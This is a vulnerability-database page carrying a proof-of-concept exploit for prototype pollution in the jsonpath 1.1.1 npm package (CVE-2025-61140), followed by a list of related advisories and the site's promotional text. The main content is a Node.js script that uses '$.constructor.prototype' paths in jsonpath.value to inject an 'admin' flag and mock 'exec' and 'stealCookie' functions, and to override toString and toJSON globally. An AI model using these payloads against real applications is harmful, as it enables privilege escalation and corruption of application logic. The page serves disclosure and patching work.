Vulners
Lucene search
📄 jsonpath 1.1.1 Prototype Pollution
| Reporter | Title | Published | Views | Family All 58 |
|---|---|---|---|---|
 | Security Bulletin: IBM App Connect Enterprise Certified Container operands are vulnerable to arbitrary code execution (CVE-2025-13465, CVE-2025-61140) and denial of service (CVE-2025-15284) | 3 Mar 202615:45 | – | ibm |
| Security Bulletin: IBM Sterling Secure Proxy is vulnerable to multiple issues | 26 Feb 202603:04 | – | ibm |
 | CVE-2025-61140 | 28 Jan 202600:00 | – | attackerkb |
 | CVE-2025-61140 | 30 Jan 202606:22 | – | circl |
 | JSONPath security vulnerabilities | 28 Jan 202600:00 | – | cnnvd |
 | CVE-2025-61140 | 28 Jan 202600:00 | – | cve |
 | CVE-2025-61140 | 28 Jan 202600:00 | – | cvelist |
 | EUVD-2025-206486 | 28 Jan 202600:00 | – | euvd |
 | JSONPath vulnerable to Prototype Pollution due to insufficient input validation of object keys in lib/index.js | 28 Jan 202618:30 | – | github |
 | CVE-2025-61140 | 28 Jan 202616:16 | – | nvd |
10
=============================================================================================================================================
| # Title : jsonpath 1.1.1 Prototype Pollution via constructor.prototype Assignment |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.3 (64 bits) |
| # Vendor : https://www.redhat.com/ |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/215071/ & CVE-2025-61140
[+] Summary : a prototype pollution vulnerability in jsonpath v1.1.1, where unsafe writes to $.constructor.prototype allow attackers to inject arbitrary properties and functions into Object.prototype.
By abusing jsonpath.value, an attacker can globally modify object behavior—adding flags (e.g., admin), overriding core methods (toString, toJSON), and impacting arrays and strings through
the shared prototype chain. The PoC runs in Node.js and shows how a vulnerable application that accepts user‑controlled JSONPath expressions can be compromised,
leading to privilege escalation and logic manipulation across the entire runtime.
Unvalidated writes to constructor.prototype enable global state corruption—making prototype pollution a high‑impact risk even without direct code execution.
[+] POC :
const jsonpath = require('jsonpath');
console.log("=== Prototype Pollution PoC By indoushka(jsonpath 1.1.1) ===\n");
console.log("1. Basic Test:");
console.log("Before:", ({}).polluted); // undefined
jsonpath.value({}, '$.constructor.prototype.polluted', "Yes, polluted");
jsonpath.value({}, '$.constructor.prototype.isHacked', true);
jsonpath.value({}, '$.constructor.prototype.hacker', "attacker");
console.log("After polluted:", ({}).polluted);
console.log("After isHacked:", ({}).isHacked);
console.log("After hacker:", ({}).hacker);
console.log("\n2. Function Injection:");
jsonpath.value({}, '$.constructor.prototype.exec', function (cmd) {
return `[MOCK EXEC] ${cmd}`;
});
jsonpath.value({}, '$.constructor.prototype.stealCookie', function () {
return "Node.js environment – no cookies";
});
const o = {};
console.log(o.exec("whoami"));
console.log(o.stealCookie());
console.log("\n3. Behavior Modification:");
const originalToString = Object.prototype.toString;
const originalToJSON = Object.prototype.toJSON;
jsonpath.value({}, '$.constructor.prototype.toString', function () {
return "[Object HACKED]";
});
jsonpath.value({}, '$.constructor.prototype.toJSON', function () {
return { hacked: true };
});
const test = { a: 1 };
console.log("toString:", test.toString());
console.log("JSON:", JSON.stringify(test));
console.log("\n4. Other Types:");
const arr = [1, 2, 3];
console.log("Array polluted:", arr.polluted);
const str = "hello";
console.log("String polluted:", str.polluted);
console.log("\n5. Practical Scenario:");
function vulnerableApplication(path, value) {
jsonpath.value({}, path, value);
}
console.log("Before admin:", ({}).admin);
vulnerableApplication(
'$.constructor.prototype.admin',
true
);
console.log("After admin:", ({}).admin);
console.log("\n6. Cleanup:");
delete Object.prototype.polluted;
delete Object.prototype.isHacked;
delete Object.prototype.hacker;
delete Object.prototype.exec;
delete Object.prototype.stealCookie;
delete Object.prototype.admin;
Object.prototype.toString = originalToString;
Object.prototype.toJSON = originalToJSON;
console.log("After cleanup polluted:", ({}).polluted);
console.log("After cleanup admin:", ({}).admin);
Greetings to :======================================================================
jericho * Larry W. Cashdollar * r00t * Hussin-X * Malvuln (John Page aka hyp3rlinx)|
====================================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
10 Feb 2026 00:00Current
6Medium risk
Vulners AI Score6
CVSS 3.19.8
EPSS0.00089
SSVC